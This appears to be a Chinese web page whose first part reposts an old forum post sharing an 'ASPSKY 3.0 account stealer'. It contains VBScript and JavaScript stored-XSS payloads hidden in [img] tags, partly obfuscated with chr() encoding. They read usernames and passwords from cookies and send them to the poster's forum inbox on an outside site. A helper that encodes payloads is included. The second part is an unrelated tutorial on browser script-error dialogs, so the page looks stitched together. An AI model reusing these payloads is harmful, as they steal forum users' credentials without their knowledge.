跨站脚本弹框问题解决
【菜科解读】
跨站脚本得COOKIE弹框框的问题
同时把密码用户名发到你在论坛的邮相里,爽吧
先头看到欲望之翼的self.window的办法
其实我一直有个从来没给任何人说的办法:
玩了好久了公布了呵呵:
script language=vbs>
sub changeq()
if form1.loc.value="" or form1.who.value="" then
msgbox "没有加入地址或用户名?"
exit sub
end if
loc=form1.loc.value
user=form1.who.value
str="[img]vbscript:execute("on error resume next: call document.body.inse
rtAdjacentHTML(""beforeEnd"",""""):call se
ndmessage.window.open(""" & loc & "/messanger.asp?action=send&touser="
& user & "&title=""+mid(documents.cookie,instr(lcase(documents.cookie),
""password"")+9,10)+""&message=""+""I am a goo
d boy"",""_self"") ")[/img]"
form1.area.value=str
end sub
/script
ASPSKY 3.0 偷号器---C.Z.Y原创
设置发送地址:
▲注意发送地址形如:http://www.nnit30.com/newbbs(newbbs是网站中论坛的安装目录
最后
不用加/)
发送的用户名:-------------
生成的代码:)
搞了大半天的结果,偷aspsky 3.0 密码的东东把下面的代码改一改
然后发到你的贴子里,只要有人看你的贴子他的密码就自动发到你的在
论坛上的邮箱里了,爽吧,其实我的是用VBScript写的snwcwt用javascript
写的没有双引号的问题而且可以同时写几行代码所以要实用一些!!
不过效果都差不多哈:)(注意要先把下面的东东改一下发送的地址然
后全部写在一行里)
[img]vbscript:window.open(chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&ch
r(47)&chr(119)&chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr
(51)&chr(48)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119
)&chr(98)&chr(98)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&c
hr(110)&chr(103)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr
(97)&chr(99)&chr(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(1
10)&chr(100)&chr(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(6
1)&chr(99)&chr(122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101
)&chr(61)&chr(104)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)
&chr(115)&chr(97)&chr(103)&chr(101)&chr(61)+chr(80)&chr(97)&chr(115)&chr(115)&ch
r(58)+mid(lcase(documents.cookie),instr(lcase(documents.cookie),chr(112)+chr(97)+c
hr(115)+chr(115)+chr(119)+chr(111)+chr(114)+chr(100))+9,len(documents.cookie)-ins
tr(lcase(documents.cookie),chr(112)+chr(97)+chr(115)+chr(115)+chr(119)+chr(111)+c
hr(114)+chr(100))+9)+chr(32)+chr(32)+chr(32)+chr(32)+chr(78)&chr(97)&chr(109)&ch
r(101)&chr(58)+mid(lcase(documents.cookie),instr(lcase(documents.cookie),chr(117)+
chr(115)+chr(101)+chr(114)+chr(110)+chr(97)+chr(109)+chr(101))+9,(instr(lcase(do
cument.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(99)+chr(108)+chr(97)+chr(
115))-1)-instr(lcase(documents.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(11
0)+chr(97)+chr(109)+chr(101))-9),chr(49)&chr(49),chr(116)&chr(111)&chr(112)&chr(
61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(108)&chr(101)&chr(102)&chr(116)&
chr(61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(104)&chr(101)&chr(105)&chr(1
03)&chr(104)&chr(116)&chr(61)&chr(49)&chr(44)&chr(119)&chr(105)&chr(100)&chr(116
)&chr(104)&chr(61)&chr(49))[/img]
简化形式:window.open(打开的连接,窗体名,窗体大小设置)
打开的连接:
第一部份:http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send.....
对应编码为:chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)&
chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr(51)&chr(48)&ch
r(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119)&chr(98)&chr(9
8)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(110)&chr(103
)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(97)&chr(99)&ch
r(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(110)&chr(100)&ch
r(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(61)&chr(99)&chr(
122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101)&chr(61)&chr(1
04)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)&chr(115)&chr(9
7)&chr(103)&chr(101)&chr(61)
不同的网站要自已改注意在哪儿结束同时还有发到的用户名都在这儿改
对于编码看如下代码:
script language=vbs>
sub main()
base=form1.text1.value
for i=1 to len(base)
aa=asc(mid(base,i,1))
document.write "chr(" & aa & ")" & "&"
next
end sub
/script
第二部份:为提取的COOKIE中的用户名和密码
------------------------再来一个js的放便学习----------------------------------
[img]javascript:eval('var myCookie=documents.cookie;var iUser0=myCookie.indexOf(\
'username=\');var iUser1=myCookie.indexOf(\'&\',iUser0);if(iUser1==-1) iUser1=my
Cookie.length;var username=myCookie.substring(iUser0+9,iUser1);var iPW0=myCookie
.indexOf(\'password=\');iPW1=myCookie.indexOf(\'&\',iPW0);if(iPW1==-1) iPW1=myCo
okie.length;var password=myCookie.substring(iPW0+9,iPW1);document.body.insertAdj
acentHTML(\'BeforeEnd\',\'\');sendmessage.window.docum
ent.location=\'http://www.nnit30.com/newbbs/messanger.asp?action=send&touser=snw
cwt&title=\'+username+\'的密码&message=username=\'+username+\' password=\'+pa
ssword+\'\';')[/img]
跨站,脚本,弹框,问题,解决,跨站,脚本,得,COOKIE,当前页面脚本发生错误,小猪教您当前页面脚本发生错误的解决方法
小伙伴你们听完过后是不是很想跟小编一块去看看呢?想的话那就去看看呗!要是进入网页的时候都弹出怎么一个“当前页面脚本发生错误”的对话框的话,那么的确是会使我们感到厌烦,每次打开页面都弹出一次,然后底部会提示:是否要在此页面上继续运行脚本?我们可以选的是或者否,选择之后当前页面脚本发生错误对话框就消失了1,启动Internet Explorer浏览器,然后在顶部菜单的“工具”菜单上,单击“Internet 选项”。
当前页面脚本发生错误载图12,再在“Internet 选项”对话框中,单击“安全”。
然后选择单击“默认级别”。
,之后再点击底部的“确认”即可浏览器载图23,然后再次进入浏览器Internet 选项,切换到“程序”选项卡,然后再点击底部的“管理加载项”当前页面脚本发生错误载图34,之后在弹出的管理加载中,将一些可疑的加载项全部禁用即可,如下图:浏览器载图45,通过以上两项设置基本都可以解决问题,如果问题依旧请再尝试,进入控制面板中的“系统”,切换到“高级”选项卡,单击“错误报告”按钮,选中“禁用错误报告”选项,并选中“但在发生严重错误时通知我”,最后单击“确定”按钮。
当前网页载图56,最后在打开浏览器,如果问题依旧,请点击“工具”进入Internet 选项,然后选择删除历史记录与Cookie等即可,如下图:发生错误载图67,如果问题还是没有解决,请先下载好一个浏览器,再卸载本浏览器,之后安装新浏览器就可以得到解决了。
发生错误,当前页面脚本发生错误,浏览器,当前网页
